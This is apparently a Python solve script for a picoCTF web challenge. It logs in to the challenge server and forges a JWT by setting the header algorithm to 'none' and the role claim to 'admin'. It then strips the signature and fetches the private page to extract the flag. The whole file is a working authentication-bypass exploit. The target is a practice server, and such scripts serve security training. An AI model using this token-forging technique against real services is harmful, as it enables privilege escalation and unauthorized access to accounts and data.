import requests
import json
import re
from base64 import urlsafe_b64encode, urlsafe_b64decode

# URL Configuration
base_url = "http://saturn.picoctf.net:54945"

# Perform login
response = requests.post(base_url + "/auth", data={"username": "test", "password": "Test123!"}, allow_redirects=False)
token = response.cookies.get("token")

# Decode and modify the JWT
try:
    header_enc, payload_enc, _ = token.split(".")
except ValueError:
    print("Invalid JWT token")
    exit()

# Modify the header (set algorithm to none)
header_dec = urlsafe_b64decode(header_enc + "==").decode()
header = json.loads(header_dec)
header["alg"] = "none"
header_mod = urlsafe_b64encode(
    json.dumps(header, separators=(",", ":")).encode()
).decode().replace("=", "")

# Modify the payload (add/set admin role)
payload_dec = urlsafe_b64decode(payload_enc + "==").decode()
payload = json.loads(payload_dec)
payload["role"] = "admin"  # Modify critical key
payload_mod = urlsafe_b64encode(
    json.dumps(payload, separators=(",", ":")).encode()
).decode().replace("=", "")

# Reconstruct the token without a signature
modified_token = f"{header_mod}.{payload_mod}."
# Access the private page with the new admin cookie and extract the flag
print("\nFLAG: " + re.search(r"picoCTF\{.*?\}", requests.get(base_url + "/private", cookies={"token": modified_token}).text).group(0))
